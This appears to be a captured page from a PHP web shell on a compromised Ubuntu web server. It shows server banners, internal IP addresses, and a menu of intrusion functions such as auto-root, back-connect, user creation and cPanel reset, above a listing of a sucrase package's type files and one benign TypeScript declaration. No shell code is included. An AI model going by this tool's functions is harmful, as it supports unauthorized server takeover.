Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
sucrase /
dist /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
parser
[ DIR ]
drwxr-xr-x
transformers
[ DIR ]
drwxr-xr-x
util
[ DIR ]
drwxr-xr-x
CJSImportProcessor.d.ts
2.75
KB
-rw-r--r--
HelperManager.d.ts
437
B
-rw-r--r--
NameManager.d.ts
252
B
-rw-r--r--
Options-gen-types.d.ts
332
B
-rw-r--r--
Options.d.ts
3.29
KB
-rw-r--r--
TokenProcessor.d.ts
3.71
KB
-rw-r--r--
cli.d.ts
37
B
-rw-r--r--
computeSourceMap.d.ts
733
B
-rw-r--r--
identifyShadowedGlobals.d.ts
621
B
-rw-r--r--
index.d.ts
1.02
KB
-rw-r--r--
register.d.ts
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CJSImportProcessor.d.ts
import type { HelperManager } from "./HelperManager"; import type { Options } from "./index"; import type NameManager from "./NameManager"; import type TokenProcessor from "./TokenProcessor"; /** * Class responsible for preprocessing and bookkeeping import and export declarations within the * file. * * TypeScript uses a simpler mechanism that does not use functions like interopRequireDefault and * interopRequireWildcard, so we also allow that mode for compatibility. */ export default class CJSImportProcessor { readonly nameManager: NameManager; readonly tokens: TokenProcessor; readonly enableLegacyTypeScriptModuleInterop: boolean; readonly options: Options; readonly isTypeScriptTransformEnabled: boolean; readonly keepUnusedImports: boolean; readonly helperManager: HelperManager; private nonTypeIdentifiers; private importInfoByPath; private importsToReplace; private identifierReplacements; private exportBindingsByLocalName; constructor(nameManager: NameManager, tokens: TokenProcessor, enableLegacyTypeScriptModuleInterop: boolean, options: Options, isTypeScriptTransformEnabled: boolean, keepUnusedImports: boolean, helperManager: HelperManager); preprocessTokens(): void; /** * In TypeScript, import statements that only import types should be removed. * This includes `import {} from 'foo';`, but not `import 'foo';`. */ pruneTypeOnlyImports(): void; shouldAutomaticallyElideImportedName(name: string): boolean; private generateImportReplacements; getFreeIdentifierForPath(path: string): string; private preprocessImportAtIndex; private preprocessExportAtIndex; private preprocessVarExportAtIndex; /** * Walk this export statement just in case it's an export...from statement. * If it is, combine it into the import info for that path. Otherwise, just * bail out; it'll be handled later. */ private preprocessNamedExportAtIndex; private preprocessExportStarAtIndex; private getNamedImports; /** * Get a mutable import info object for this path, creating one if it doesn't * exist yet. */ private getImportInfo; private addExportBinding; /** * Return the code to use for the import for this path, or the empty string if * the code has already been "claimed" by a previous import. */ claimImportCode(importPath: string): string; getIdentifierReplacement(identifierName: string): string | null; /** * Return a string like `exports.foo = exports.bar`. */ resolveExportBinding(assignedName: string): string | null; /** * Return all imported/exported names where we might be interested in whether usages of those * names are shadowed. */ getGlobalNames(): Set<string>; }
Close